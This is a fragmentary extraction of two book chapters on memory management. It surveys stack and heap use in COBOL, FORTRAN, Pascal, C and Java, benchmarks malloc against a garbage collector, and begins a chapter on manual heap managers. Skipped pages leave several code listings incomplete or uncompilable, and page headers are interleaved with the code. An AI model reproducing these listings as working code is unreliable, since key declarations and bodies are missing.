long msecs1,msecs2;
unsigned char *bdwptr[16*KB];
High-Level Services 167
msecs1 = msecs2 = 0;
msecs1 = GetTickCount();
for(j=0;j<(16*KB);j++)
{
bdwptr[j] = malloc(KB);
for(i=0;i<KB;i++){ (bdwptr[j])[i]='a'; }
}
msecs2 = GetTickCount();
printf("msec elapsed=%ld\n",(msecs2-msecs1));
return;
}/*end main*/
Now consider another program that uses the BDW collector:
#include<stdio.h>
#include<windows.h>
#define GC_NOT_DLL
Chapter 3
#include<gc.h>
#define KB 1024
void main()
{
short j;
unsigned long i;
long msecs1,msecs2;
msecs1 = msecs2 = 0;
msecs1 = GetTickCount();
for(j=0;j<(16*1024);j++)
{
unsigned char *bdwptr;
bdwptr = GC_malloc(KB);
for(i=0;i<KB;i++){ bdwptr[i]='a'; }
}
msecs2 = GetTickCount();
printf("msec elapsed=%ld\n",(msecs2-msecs1));
return;
}/*end main*/
The program that used malloc() completed execution in 427 mil-
liseconds. The program that used the BDW garbage collector took
627 milliseconds to execute. I ran each of these programs several
times to prove to myself that this wasn’t some kind of fluke.
168 Chapter 3
n Manual memory program times: 432, 427, 426, 443, 435, 430,
437, 430
n BDW collector program times: 633, 622, 624, 650, 615, 613,
630, 627
Time units are in milliseconds. I could have performed more trials
and included an extended statistical analysis of mean values, but I
think the results are already pretty clear.
Chapter 3
of structured programming in the late 1960s. The essay that led to
the birth of structured programming was written by Dijkstra in
1968. It was a letter in the Communications of the ACM titled
“GOTO Statement Considered Harmful.” This revolutionary paper
caused quite a stir. The state-of-the-art languages at the time, like
COBOL II and FORTRAN IV, used GOTOs liberally.
From Table 3.5, it seems that the number of lines of code that can
be efficiently managed by a language increase by a factor of 10 as
you switch to more sophisticated paradigms (see Table 3.6).
Table 3.6
Language Paradigm Complexity Threshold
Raw binary no-holds-barred 10,000 instructions
Assembler block-based using GOTO 100,000 lines
C structured (no GOTO) 1,000,000 lines
C++ object-oriented 10,000,000 lines
Inevitably, the languages that survive, and perhaps pass on their fea-
tures to new languages, will be the ones that are the most effective
at managing complexity. In the early days of UNIX, almost every bit
of system code was written in C. As operating systems have grown,
the use of C, as a matter of necessity, has given way to implementa-
tion in C++. According to an article in the July 29, 1996, Wall Street
Journal, the Windows NT operating system consists of 16.5 million
lines of code. It is no surprise, then, that Microsoft has begun build-
ing some of its primary OS components entirely in C++. For
example, a fundamental component of the Windows NT kernel, the
High-Level Services 171
Chapter 3
There are memory managers today that allow dozens of tightly
coupled processors to share the same address space, and there
are elegant object-oriented languages that allow complexity to be
constrained.
In the following sections, I am going to provide a brief survey of
several programming languages in order to demonstrate how differ-
ent languages make use of the different high-level memory
services. I will begin with early languages and work my way slowly
to the present day. Along the way, I will try to offer examples and
insight whenever I have the opportunity.
life of its own and probably developed enough inertia to last at least
another hundred years.
The preponderance of COBOL is partially due to historical
forces. COBOL was adopted by the United States Department of
Defense (DoD) in 1960 and became a de facto standard. The reason
for this is that the DoD, the largest purchaser of computer hardware
both then and now, would not buy hardware for data processing
unless the vendor provided a COBOL compiler. Another reason
COBOL is so widespread is due to the fact that COBOL is very
good at what it is designed for — executing business calculations.
When it comes to performing financial computations to fractions of a
cent without introducing rounding errors, COBOL is still the king of
the hill. The language features that support financial mathematics in
COBOL are a very natural part of the language and extremely easy
to use.
QUESTION
Will COBOL ever die? Will it be replaced?
ANSWER
I would like to assume that someday COBOL will be retured.
However, I suspect that COBOL houses will probably, fundamen-
tally, stay COBOL houses. 180 billion lines is a lot of source code.
They may occasionally renovate with Object COBOL or slap on a
new layer of paint with Java, but replacing the plumbing of an
aging mansion is a very expensive proposition. In fact, it’s often
cheaper to just tear the house down and build a new one. Try
explaining this to the CFO of a Fortune 100 company.
Legacy code may be old, but it supports core business func-
tionality and has been painstakingly debugged. In this kind of
situation, legacy code is seen as a corporate asset that represents
the investment of hundreds of thousands of man-hours. An archi-
tect who actually does want to overhaul a system will, no doubt,
face resistance from a CFO whose orientation tends toward dol-
lars and cents. If a system does what it’s supposed to and helps to
generate income, then why fix it? Throwing everything away for
the sake of technology alone is a ridiculously poor excuse.
Another factor that inhibits the replacement of legacy code is
the sheer size of an existing code base. In order to replace old
code with new code, you have to completely understand the func-
tionality that the old code provides. In a million-line labyrinth of
80-column code, business logic is hard to extract and duplicate.
Often, the people who wrote the code have left the company or
have been promoted to different divisions. Instituting even
High-Level Services 173
Chapter 3
are running Windows, you can download a copy from Fujitsu’s web
site.
COBOL is a structured language that does not use a stack or a
heap. All that a COBOL program has at its disposal is a single global
data section and blocks of instructions. In COBOL parlance, a pro-
gram consists of four divisions:
1. Identification division
2. Environment division
3. Data division
4. Procedure division
The identification division is used to let the COBOL compiler know
the name of the program it is translating. The identification division
doesn’t get translated in machine code; it is more of a directive. The
environment division is used to describe the platform that a pro-
gram will be built on and run on, as well as to specify the files that it
will use. Again, this is mostly metadata that is intended for use by
the compiler.
The data division contains, among other things, a working stor-
age section that is basically a large static memory region that serves
all of a program’s storage needs. As I said before, there is no heap
and no stack that a COBOL program can utilize. All that exists is
one big chunk of fixed-size, global memory.
The procedure division consists of blocks of instructions. These
blocks of code do not have formal parameters or local variables like
functions in C. This would require a stack, which COBOL programs
174 Chapter 3
Chapter 3
Figure 3.14
NOTE You might notice line numbers in the previous program’s list-
ing. This is a holdover from the days when punch cards were fed to
mainframes. The motivation was that if you dropped your box of cards
and they became mixed up, you could use the line numbering to sort
your cards back to the proper order.
.MODEL small, c
.STACK
;working storage-----------------------
.DATA
assets DW 0H
debt DW 0H
net DW 0H
;procedure division--------------------
.CODE
.STARTUP
MOV AX,07H
176 Chapter 3
MOV [assets],AX
MOV AX,03H
MOV [debt],AX
MOV DX,[assets]
MOV CX,[debt]
SUB DX,CX
ADD DX,'0'
MOV AH,0EH
MOV AL,DL
INT 10H
.EXIT
END
000051*--------------------------------------------------
000052 SUBROUTINES SECTION.
000053 INIT-ARRAY.
000054 MOVE 5 TO ARRAY-ELM (1).
000055 MOVE 6 TO ARRAY-ELM (2).
000056 MOVE 3 TO ARRAY-ELM (3).
000057 MOVE 7 TO ARRAY-ELM (4).
000058 MOVE 4 TO ARRAY-ELM (5).
000060 COMPUTE-AVERAGE.
000062 PERFORM COMPUTE-AVERAGE-SUM ARRAY-SIZE TIMES.
000064 DIVIDE ARRAY-SIZE INTO AVERAGE.
000065 DISPLAY "average is: " AVERAGE.
000070 COMPUTE-AVERAGE-SUM.
000071 ADD ARRAY-ELM(COUNT-INDEX) TO AVERAGE.
000081 ADD 1 TO COUNT-INDEX.
000091 GET-MAX.
000101 MOVE 1 TO COUNT-INDEX.
000102 MOVE ARRAY-ELM(1) TO ARRAY-MAX.
000111 PERFORM GET-MAX-EXAMINE-CURRENT ARRAY-SIZE
Chapter 3
TIMES.
000112 DISPLAY "max is: " ARRAY-MAX.
000121 GET-MAX-EXAMINE-CURRENT.
000131 IF ARRAY-ELM(COUNT-INDEX) > ARRAY-MAX
000132 MOVE ARRAY-ELM(COUNT-INDEX) TO ARRAY-MAX
000141 END-IF
000151 ADD 1 TO COUNT-INDEX.
When this source code (statistics.cob) is compiled and linked
into an executable, it will produce the following output when run:
average is: 05
max is: 7
The absence of the stack and heap may be a good thing from the
view of a sysadmin, who does not have to worry about memory
leaks or buffer overflow exploits, but from the perspective of a pro-
grammer, COBOL’s spartan memory arrangement is a curse. Very
large COBOL applications can quickly become impossible to main-
tain or even understand. As a veteran Y2K COBOL programmer, I
can attest to this fact. Some of the programs I looked at were so
large, complicated, and crucial to business operations, that I was
often scared to touch anything.
NOTE Any computer science student who has ever studied compiler
theory will recognize the name Backus. This is because John Backus
helped invent a notation called Backus-Naur Form (BNF), which is used
to specify the context-free grammar of a programming language.
Chapter 3
CALL GETMAX(ARRAY,5,MAX)
WRITE(*,*) "max= ", MAX
END
*--------------------------------------------------------
REAL FUNCTION GETAVG(ARR,NELM)
INTEGER ARR(NELM)
INTEGER INDEX
REAL SUM
SUM=0
DO 10,INDEX = 1,NELM
SUM=SUM+ARR(INDEX)
10 CONTINUE
GETAVG = SUM/NELM
END
*--------------------------------------------------------
SUBROUTINE GETMAX(ARR,NELM,MX)
INTEGER ARR(NELM)
INTEGER MX
MX=ARR(1)
DO 20,INDEX =2,NELM
IF(ARR(INDEX)>MX) THEN
MX = ARR(INDEX)
END IF
20 CONTINUE
END
If you run this program, you will see:
val= 10.1999998
max= 26
As you can see, F77 provides much better encapsulation than
COBOL 85. Each procedure is capable of declaring its own
180 Chapter 3
Figure 3.15
INTEGER VAL
INTEGER SUM
SAVE SUM
SUM=SUM+VAL
SIGMA = SUM
END
When the previous program is run, the following output is
displayed:
3.
8.
10.
17.
Chapter 3
gramming language called ALGOL. This seems only natural when
you consider that Wirth was part of the group that originally created
ALGOL. During the 1960s, FORTRAN had supplanted ALGOL as
the mathematical programming language of choice. As a result, the
designers of ALGOL were looking for ways to extend the language.
Pascal supports heavy use of the stack and, unlike F77, allows
function calls to be recursive. Pascal also provides manual access to
the heap via the NEW and DISPOSE statements. Pascal allows global
variables to be defined, which are stored in a static data segment.
Pascal is the first language that we have examined that uses the
stack, the heap, and a data section.
Wirth admits, however, that Pascal is really a toy language that is
intended for educational purposes. The language has a limited set of
features, and this handicap is compounded by the fact that the
Pascal compiler enforces a rigid set of syntax rules. Pascal is not a
suitable language for developing large projects and has been called a
bondage-discipline language by some engineers. Wirth ended up
moving on to invent other languages like Modula and Oberon.
Borland, which marketed a very successful Pascal compiler in the
1980s, currently sells an object-oriented variation of Pascal called
Delphi.
procedure callNested;
function nested1:integer;
function nested2:integer;
begin
writeln('inside nested2()');
nested2 := value+1;
end;
begin
writeln('inside nested1()');
nested1 := nested2+1;
end;
begin
writeln('inside callNested()');
writeln('value= ',nested1);
end;
begin
value:=5;
callNested;
end.
When run, this program will generate the following output:
inside callNested()
value= inside nested1()
inside nested2()
7
Here is another brief example that demonstrates how Pascal can
use different memory components:
program ptour;
const
size=6;
type
intPointer=^integer;
var
iptr:intPointer;
High-Level Services 183
index:integer;
function factorial(arg:integer):integer;
begin
if arg>1 then
factorial := arg * factorial(arg-1)
else
factorial :=1;
end;
begin
index:=10;
iptr:=new(intPointer);
iptr^:=0;
for index:= 1 to size do
begin
iptr^:= iptr^ + factorial(index);
writeln('factorial(',index,')= ',factorial
(index))
Chapter 3
end;
writeln('iptr^=',iptr^);
dispose(iptr);
end.
If you run this program, the following output will be sent to the
console:
factorial(1)= 1
factorial(2)= 2
factorial(3)= 6
factorial(4)= 24
factorial(5)= 120
factorial(6)= 720
iptr^=873
The factorial() function is recursive, which proves that Pascal
implements activation records on the stack. I also manually allocate
an integer off the heap and store its address in the variable iptr^
to show how Pascal’s manual memory management scheme works.
Pascal’s variety of memory management facilities and its
easy-to-read structured format place it above COBOL 85 and F77
on the scale of sophistication. However, Pascal is not a language that
you would use to construct production software. The organization of
heavily nested routines in Pascal source code does not lend itself to
constructing large-scale applications. This is why I decided to pres-
ent Pascal before my discussion of C and Java. Pascal may possess
memory management bells and whistles, but it is not a prime-time
language.
184 Chapter 3
Case Study: C
The C programming language is the Swiss army knife of program-
ming languages. It is compact, versatile, and you can do darn near
everything with it. Perhaps this is why every operating system
being sold today has been written mostly in C. Part of C’s utility is
based on the language’s provision for low-level operations like
bit-wise manipulation and inline assembly code. C also possesses a
syntax that allows memory addresses to be symbolically manipu-
lated in a number of intricate ways. Furthermore, the fairly simple
function-based granularity of scope is a straightforward alternative
to Pascal’s tendency toward heavy procedure nesting.
#define ERR_STK_SZ 64
#define ERR_STR_SZ 128
#define ERR_LVL_WARN 0
#define ERR_LVL_ERROR 1
#define ERR_LVL_FATAL 2
struct ErrData
{
char *info;
unsigned char level;
};
void bldErr();
void checkStack();
Chapter 3
int main()
{
SP=0;
bldErr();
checkStack();
return(0);
}/*end main*/
void bldErr()
{
stack[SP]=(struct ErrData*)malloc(sizeof(struct
ErrData));
(*stack[SP]).info = malloc(ERR_STR_SZ);
(*stack[SP]).level = ERR_LVL_ERROR;
strncpy((*stack[SP]).info,"testing",ERR_STR_SZ-1);
SP++;
return;
}/*end bldError*/
void checkStack()
{
int i;
for(i=0;i<SP;i++)
{
printf("%s\n",(*stack[i]).info);
printf("%s\n",ErrLvl[(*stack[i]).level]);
}
return;
}/*end checkstack*/
186 Chapter 3
EXTRN _malloc:NEAR
EXTRN _strncpy:NEAR
_DATA SEGMENT
ORG $+2
$SG344 DB 'testing', 00H
_DATA ENDS
_TEXT SEGMENT
_bldErr PROC NEAR
push ebp
mov ebp, esp
push 8
call _malloc
add esp, 4
mov ecx, DWORD PTR _SP
mov DWORD PTR _stack[ecx*4], eax
push 128 ; 00000080H
call _malloc
add esp, 4
mov edx, DWORD PTR _SP
Chapter 3
mov ecx, DWORD PTR _stack[edx*4]
mov DWORD PTR [ecx], eax
mov edx, DWORD PTR _SP
mov eax, DWORD PTR _stack[edx*4]
mov BYTE PTR [eax+4], 1
push 127 ; 0000007fH
push OFFSET FLAT:$SG344
mov ecx, DWORD PTR _SP
mov edx, DWORD PTR _stack[ecx*4]
mov eax, DWORD PTR [edx]
push eax
call _strncpy
add esp, 12 ; 0000000cH
mov ecx, DWORD PTR _SP
add ecx, 1
mov DWORD PTR _SP, ecx
pop ebp
ret 0
_bldErr ENDP
_TEXT ENDS
EXTRN _printf:NEAR
_DATA SEGMENT
$SG350 DB '%s', 0aH, 00H
$SG351 DB '%s', 0aH, 00H
_DATA ENDS
_TEXT SEGMENT
_i$ = -4
_checkStack PROC NEAR
push ebp
mov ebp, esp
push ecx
mov DWORD PTR _i$[ebp], 0
188 Chapter 3
DD FLAT:$SG337
DD FLAT:$SG338
$SG336 DB 'WARN', 00H
ORG $+3
$SG337 DB 'ERROR', 00H
ORG $+2
$SG338 DB 'FATAL', 00H
_DATA ENDS
;--------------------------------------
_DATA SEGMENT
ORG $+2
$SG344 DB 'testing', 00H
_DATA ENDS
;--------------------------------------
_DATA SEGMENT
$SG350 DB '%s', 0aH, 00H
$SG351 DB '%s', 0aH, 00H
_DATA ENDS
Chapter 3
If you look at the assembly code for any of the functions, you will
notice that they all have prologue and epilogue code to manage acti-
vation records. This is irrefutable evidence that the stack is being
used. For example, take a look at the assembly code for
checkStack():
_checkStack PROC NEAR
;-----------------------------------
; function body implementation here
;-----------------------------------
_checkStack ENDP
Finally, the heap allocation that occurs is facilitated by the
malloc() library call, which is prototyped in stdlib.h. This
may resolve to a system call behind the scenes, such that:
stack[SP]=(struct ErrData*)malloc(sizeof(struct
ErrData));
190 Chapter 3
becomes:
push 8 ; # bytes to allocate
call _malloc ; call malloc()
add esp, 4 ; clean up stack from call
mov ecx, DWORD PTR _SP ; set up index to access stack[]
mov DWORD PTR _stack[ecx*4], eax ; address was returned
in EAX
Before the actual library call is made, the number of bytes to be
allocated is pushed onto the stack. Once the call is over, the address
of the first byte of the allocated memory region is placed in EAX.
C has supported all of its memory features since its inception.
Stack frames and heap allocation were not extensions amended to
the language by a standards committee 10 years after the first spec-
ification was released. Instead, C was the product of a few inspired
individuals who truly understood the utility of terse and simple
language syntax. Compare the grammar of C to that of a commit-
tee-based language like COBOL. In contrast to C, COBOL is a
behemoth.
But, as Stan Lee would say, “With great power, comes great
responsibility.” C’s flexibility does not come without a price. The
very features that allow C to manage memory so effectively can also
produce disastrous consequences if they are not used correctly.
Memory leaks and dangling pointers are just two of the perils that
we have seen. The syntax of C also allows addresses to be cast and
moved around so that you might not be sure what a program is
referencing.
Here is an example of what I am talking about:
/* ---mess.c--- */
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
void function4()
{
printf("called function4()\n");
return;
}/*end function4*/
void* function3()
{
char *cptr;
cptr = malloc(16);
strcpy(cptr,"now a string");
return(cptr);
High-Level Services 191
}/*end function3*/
void* function2()
{
void *fptr;
fptr = function4;
return(fptr);
}/*end function2*/
void* function1()
{
int* iptr;
iptr = malloc(sizeof(int));
*iptr = 1012;
return(iptr);
}/*end function1*/
Chapter 3
void main()
{
void *vptr;
fptr addr;
vptr = function1();
printf("%lu\n",(*((int*)vptr)));
vptr = function2();
addr = vptr;
(addr)();
vptr = function3();
printf("%s\n",(char *)vptr);
return;
}/*end main*/
When this program is executed, the following output is generated:
1012
called function4()
now a string
When it comes to pointers of type void, you often cannot tell what
is being referenced. The first call (i.e., function1()) returns the
address of an integer. The second call (i.e., function2()) returns
the address of a function. The third call (i.e., function3())
returns the address of a string. Without looking at the function
implementations themselves, you would have no idea what kind of
value you are dealing with.
192 Chapter 3
Language Features
Java is an object-oriented (OO) language. Specifically, it is a fairly
puritanical OO language. With the exception of atomic data types,
like char or int, everything is instantiated as an object. In addi-
tion, there are no stand-alone functions in Java; every function must
belong to a class. Like other OO languages, Java supports certain
kinds of object encapsulation, polymorphism, and inheritance. How-
ever, the Java compiler (javac) also enforces a number of
conventions that make it much easier to manage large projects.
Having worked at an ERP company that maintained a code base
consisting of 16 million lines of K&R C, I dread the prospect of
High-Level Services 193
hunting down header files and obscure libraries, which were invari-
ably spread across a massive, cryptic, and completely
undocumented source tree. In the past, sometimes I would spend
several hours just trying to find one source file or function defini-
tion. There were times where I would start grep at the root of a
machine’s file system and go have lunch. In fact, I distinctly remem-
ber spending an entire afternoon trying to locate the following
macro:
#define PrcBInNdNbr 14
Chapter 3
scheme, claiming that it is a characteristic of a bondage-discipline
language. These engineers have obviously never worked on a large
project. On a large project, you need to maintain organization, even
if it is instituted at the cost of flexibility. Sometimes, the only thing
between a million lines of code and absolute chaos is a set of
well-enforced conventions.
In the past, it has been up to the software engineers involved on
a project to be good citizens and obey the informal organizational
schemes. However, there was usually nothing stopping a program-
mer from breaking the rules and introducing complexity into the
system. Sure enough, there’s always at least one guy who has to do
things “his way.” As part of the language’s masterful design, the
founding fathers at JavaSoft decided that the Java run time would
take an active role in maintaining an organized source tree by
enforcing the package directory naming scheme.
Another design decision that the founding fathers made was to
eliminate explicit pointer manipulation. This was another wise deci-
sion. As you saw from the example in the last section, pointers are
easy to abuse. A sufficient dose of pointer arithmetic can make
source code both ambiguous and platform dependent. By allowing
only implicit references to objects, Java is able to safeguard pro-
grams from all sorts of pointer tomfoolery.
Finally, I think that Gosling had C++ in mind when he decided
that Java would not support multiple inheritance and operator over-
loading. As far as complexity is concerned, these two features tend
to make matters worse instead of making them better. There is
nothing scarier than looking at the twisting cyclic relationships that
194 Chapter 3
Chapter 3
Figure 3.16
Objects are really just the sum of their field values. Two different
objects of the same type can share the same method area because it
is their field values that distinguish them. To give you a feel for this,
the following code shows how you could implement this type of
setup in C:
/* --objects.c-- */
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
struct MyObject
{
int value;
char name[16];
High-Level Services 197
};
Chapter 3
return;
}/*end constructor*/
void main()
{
struct MyObject *obj1;
struct MyObject *obj2;
obj1 = constructor();
setValues(obj1,5,"object1");
toString(obj1);
obj2 = constructor();
setValues(obj2,6,"object2");
toString(obj2);
return;
}/*end main*/
If this program is executed, the following output will be produced:
value=5, name=object1
value=6, name=object2
The objects in this case are collections of fields (i.e., structures).
They both use the same member functions (i.e., constructor(),
setValues(), toString()), but they are different because
their fields are different.
The best way to see how a Java application uses memory ser-
vices in practice is to take a small Java program, disassemble it, and
examine its bytecode entrails. Consider the following Java program
198 Chapter 3
Instruction opcodes that are prefixed by a hash sign (i.e., “#”) rep-
resent indices into the run-time constant pool. The item that the
index references is placed in brackets to the right of the instruction
(i.e., <Method Memdemo(int)>). I will also sprinkle the assem-
bler with single- and double-line comments to help explain what is
going on.
Execution begins in the main() method:
public static void main(String[] args)
{
MemDemo md = new MemDemo(11);
System.out.println("sum="+md.demoFrameUsage(1));
return;
}/*end main*/
Chapter 3
Method void main(java.lang.String[])
0 new #4 <Class MemDemo> //create an object, don't initialize
3 dup //duplicate top operand, push on stack
4 bipush 11 //push argument (11) on stack
6 invokespecial #5 <Method MemDemo(int)> //initialize object we
just created
9 astore_1 //save reference to md object
StringBuffer
20 ldc #9 <String "sum="> //push reference to literal on stack
22 invokevirtual #10 <Method java.lang.StringBuffer append(java.
lang.String)>
Method MemDemo(int)
0 aload_0 //push reference to 'this' on stack
1 invokespecial #1 <Method java.lang.Object()> //call superclass
constructor
4 aload_0 //push reference to 'this' on stack
5 iload_1 //push 'size' on stack
6 newarray int //create an integer array object
8 putfield #2 <Field int array[]> //set array field for 'this'
object
11 return
After MemDemo() has returned, the demoFrameUsage() method
is invoked next. Let’s take a look at its Java code and the associated
bytecode assembler. As before, most of the push instructions are
setups for other instructions.
public int demoFrameUsage(int first)
{
int i;
int j;
sum = 0;
for(i=0;i<array.length;i++)
{
array[i]=first;
first++;
sum = sum+array[i];
}
return(sum);
}/*end demoFrameUsage*/
Chapter 3
35 iinc 2 1 //increment 'i' by 1
Figure 3.17
Memory Management:
The Three-layer Cake
You have just spanned the spectrum of memory services that a com-
puter provides. The previous chapters have been relatively dense,
and it would be easy to let the details overwhelm you. To help illu-
minate the big picture, I am going to dedicate this section to pulling
everything together.
Memory management occurs at three levels. In the basement
lies the processor. The processor provides a set of system registers
(i.e., GDTR) and dedicated instructions (i.e., LGDTR) that support
the construction of memory management data structures. These
data structures include descriptor tables, page directories, and page
tables. The processor cannot actually create these data structures;
instead, it merely supports their creation and use.
Upstairs, on the street level, is the operating system. The oper-
ating system is responsible for taking the raw materials provided by
the hardware and constructing an actual memory management
implementation. The operating system has to decide which proces-
sor features to use and to what extent. For example, both
segmentation and paging can be used to institute memory protec-
tion. The Intel Pentium supports four levels of privilege for memory
High-Level Services 203
segments via the DPL field in descriptor table entries and two lev-
els of privilege for paging via the Supervisor/User flag in page table
entries. All three of the protected mode operating systems that we
looked at in Chapter 2 used paging as the primary mechanism to
implement privilege and access protocols.
Several floors up, sunning themselves on the balcony of a pent-
house suite, are the user applications. User applications have it
easy. They are insulated from the ugly details of memory manage-
ment that occur down in the boiler room. When a user application
needs memory, it sends a request to the operating system through a
third party known as the system call interface. Why leave the pent-
house for dinner when you can have the butler pick it up?
User applications view their own address space in terms of a set
of memory regions. Most applications can see a stack, heap, data
section, and code section. The extent to which they use these
regions is determined both by the development tools being used
Chapter 3
and the run-time libraries that the applications invoke. As we saw in
this chapter, older languages tend to possess very primitive mem-
ory models. Languages like COBOL 85 and F77 really only use a
code section and a static data section. Contemporary languages, like
Java, have very sophisticated memory models that make heavy use
of the heap and stacks.
The “three-layer cake” of memory management is displayed in
Figure 3.18.
Figure 3.18
204 Chapter 3
References
ANSI, X3.23-1985 (R1991), Programming Languages — COBOL.
This is the COBOL 85 ANSI standard; when someone talks
about ANSI COBOL, they are referring to this standard and the
1989 amendments.
ANSI, X3.23b-1993 (R1998), amendment to ANSI X3.23-1985,
updated with ANSI X3.23a-1989.
ANSI/ISO/IEC 1539-1:1997, Programming languages — Fortran —
Part 1: Base language.
This is the most recent FORTRAN specification.
ANSI, ISO/IEC 9899:1999, Programming languages — C.
This is the most recent C specification.
Baroudi, Carol. Mastering Cobol. 1999, Sybex, ISBN: 078212321X.
According to Carol, there are 500 billion lines of COBOL code
in existence. Unfortunately, she does not reference her sources
(bad move). I believe that the Gartner Group’s figure of 180 bil-
lion has more credibility.
Cooper, Doug. Oh! Pascal. 1993, W.W. Norton & Company, ISBN:
0393963985.
Diwan, A., D. Tarditi, and E. Moss. Memory Subsystem Performance
of Programs with Intensive Heap Allocation. 1993, Carnegie
Mellon University, Technical Report CMU-CS-93-227.
Graham, Paul. ANSI Common LISP. 1995, Prentice Hall, ISBN:
0133708756.
Joy, B. (Ed.), G. Steele, and J. Gosling. The Java Language Specifica-
tion. 2000 Addison-Wesley, ISBN: 0201310082.
Lindholm, T. and F. Yellin. The Java Virtual Machine Specification.
1999, Addison-Wesley; ISBN: 0201432943.
For a specification, and I have waded through many, this one is
not too difficult to digest. Still, you might want to have Meyer
and Downing’s book sitting next to you.
Metcalf, M. and J. Reid. Fortran 90/95 Explained. 1999, Oxford Uni-
versity Press, ISBN: 0198505582.
Meyer, J. and T. Downing. Java Virtual Machine. 1997, O’Reilly &
Associates, ISBN: 1565921941.
This is an excellent companion to the actual JVM specification.
High-Level Services 205
Chapter 3
AT&T Bell Laboratories Technical Journal 63 No. 6 Part 2, Octo-
ber 1984, pp. 1577-93.
Ritchie, Dennis M. The Development of the C Language. 1993, Asso-
ciation for Computing Machinery.
Tanenbaum, A. and A. Woodhull. Operating Systems: Design and
Implementation. 1997, Prentice Hall, ISBN: 0136386776.
Zorn, Benjamin. The Measured Cost of Conservative Garbage Collec-
tion. 1992, University of Colorado at Boulder, Technical Report,
CU-CS-573-92.
This is the original paper that touts the BDW garbage collector
as having “comparable” performance relative to malloc() and
free(). You can crank through the numbers yourself to see
what “comparable” means.
Zorn, B. and D. Grunwald. Empirical Measurements of Six Alloca-
tion-Intensive C Programs. 1992, University of Colorado at Boul-
der, Technical Report, CU-CS-604-92.
This paper looks at the allocation behavior of Cfraq, Espresso,
GhostScript, Gnu Awk, Perl, and Chameleon.
Zorn, B., D. Detlefs, and A. Dosser. Memory Allocation Costs in
Large C and C++ Programs. 1993, University of Colorado at
Boulder, Technical Report, CU-CS-665-93.
This is another paper that looks at the comparable perfor-
mance of garbage collectors.
Chapter 4
Manual Memory
Management
Managing memory in the heap is defined by the requirement that
services be provided to allocate and deallocate arbitrary size blocks
of memory in an arbitrary order. In other words, the heap is a
free-for-all zone, and the heap manager has to be flexible enough to
deal with a number of possible requests. There are two ways to
manage the heap: manual and automatic memory management. In
this chapter, I will take an in-depth look at manual memory manage-
ment and how it is implemented in practice.
207
208 Chapter 4
void main()
{
char *cptr;
initMemMgr();
cptr = newMalloc(10);
if(cptr==NULL){ printf("allocation failed!\n"); }
newFree(cptr);
closeMemMgr();
return;
}
The remainder of this chapter will be devoted to describing three
different approaches. In each case, I will present the requisite back-
ground theory, offer a concrete implementation, provide a test
driver, and look at associated trade-offs. Along the way, I will also
discuss performance measuring techniques and issues related to
program simulation.
Figure 4.1
Manual Memory Management 209
Figure 4.2
Chapter 4
DWORD dwBytes);
BOOL HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem);
Here is a short example to give you a feel for how these functions
are utilized. In the following example, I allocate a 2MB heap and
populate it with the letter “a.” Then I increase the size of the heap
by 1MB (without moving the original memory block) and repopulate
it all with “a.”
/* --heapDemo.c-- */
#include<stdio.h>
#include<windows.h>
#define MB 1048576
#define U1 unsigned char
#define U4 unsigned long
void main()
{
HANDLE handle;
U4 *ptr;
U1 *cptr;
210 Chapter 4
int i;
handle = GetProcessHeap();
if(handle==NULL)
{
printf("could not get heap handle\n");
return;
}
ptr = HeapAlloc(handle,HEAP_ZERO_MEMORY,2*MB);
if(ptr==NULL)
{
printf("HeapAlloc() failed\n");
return;
}
printf("address=%p\n",ptr);
printf("size=%lu\n",HeapSize(handle,HEAP_NO_SERIALIZE,ptr));
cptr = (U1*)ptr;
/*increase heap by 1MB but do NOT move and fill with 'a'--*/
ptr = HeapReAlloc(handle,HEAP_REALLOC_IN_PLACE_ONLY,
ptr,3*MB);
if(ptr==NULL)
{
printf("HeapAlloc() failed\n");
return;
}
printf("address=%p\n",ptr);
printf("size=%lu\n",HeapSize(handle,HEAP_NO_SERIALIZE,ptr));
cptr = (U1*)ptr;
if(HeapFree(handle,HEAP_NO_SERIALIZE,ptr)==0)
{
printf("HeapFree() failed\n");
return;
}
Manual Memory Management 211
return;
}
If you value portability above more direct access to the kernel, you
could probably get away with using malloc() to allocate yourself a
large “heap,” though (see Figure 4.3) this would add an extra layer
of code between the memory management that I am going to imple-
ment and the operating system.
Figure 4.3
Chapter 4
Keep It Simple.. . Stupid!
My goal in this chapter is to help you learn how to implement your
own manual memory management code. I could have very easily
gotten sidetracked with optimization, and my code would have
quickly become very hard to read (if not impossible). If you want to
see what I mean, go look at the malloc.c code for the Gnu Com-
piler Collection. It should keep you occupied for a couple of hours,
or maybe a day or two.
Hence, I had to strike a balance between performance and com-
prehension. I have decided, in the interest of keeping the learning
threshold low, that I would keep my source code as simple as possi-
ble. I will not try to impress you with syntactic acrobatics. Instead, I
intend to show you the basic idea so that you can “get it” without
seven hours of frustrating rereading. Having perused several
malloc() implementations myself, I know how demoralizing it
can be to have to decipher optimized code.
212 Chapter 4
I also make the assumption that this chapter’s code will be exe-
cuting in a single-threaded environment. I know that some members
of the reading audience may be gasping at my negligence. Again, I
want to focus on memory management without being distracted by
complicated synchronization issues. Once you have a working
knowledge under your belt, you can add all the amenities. I will
leave it as an exercise to the reader to make everything thread safe.
Measuring Performance
Given that I have decided to error on the side of simplicity, it would
be interesting to see what it costs me in terms of performance rela-
tive to a commercial implementation of malloc() and free().
Although marketing people will barrage you with all sorts of
obscure metrics when they are trying to sell you something, mea-
suring performance is really not that complicated, as you will see.
NOTE There are other measures of performance that you may see
in literature, like MIPS (millions of instructions per second) and
MFLOPS (million floating-point operations per second), but these are
poor metrics that can lead to confusing comparisons. For an explana-
tion of why, see Patterson and Hennessey’s book.
Naturally, there are ways to slice and dice execution time. You can
measure how much time the processor itself spends executing a
program. This may be a pertinent value if you are working on a
multitasking operating system. If you are executing a program on a
machine that is carrying a heavy load of tasks, the program under
observation may appear to run more slowly (via wall clock time)
even if it is actually running faster.
You can subdivide processor time into how much time the pro-
cessor spends executing a task in user mode and how much time
the processor spends executing a task in kernel mode. Encryption
programs spend most of their time in user space crunching num-
bers, while I/O-intensive programs spend most of their time in
kernel space interacting with the hardware.
Manual Memory Management 213
Chapter 4
was a single-user Windows 2000 machine with a bare minimum
number of running tasks.
My hope, however, is not that the individual measurements will
mean anything by themselves. Rather, I am more interested in see-
ing how the different algorithms compare to each other. You should
notice a time differential between algorithms, as long as the other
three independent variables (hardware, tools, data) are held con-
stant. This time differential is what is important.
#include<stdio.h>
#include<time.h>
#include<windows.h>
void main()
{
unsigned long i;
time_t t1,t2;
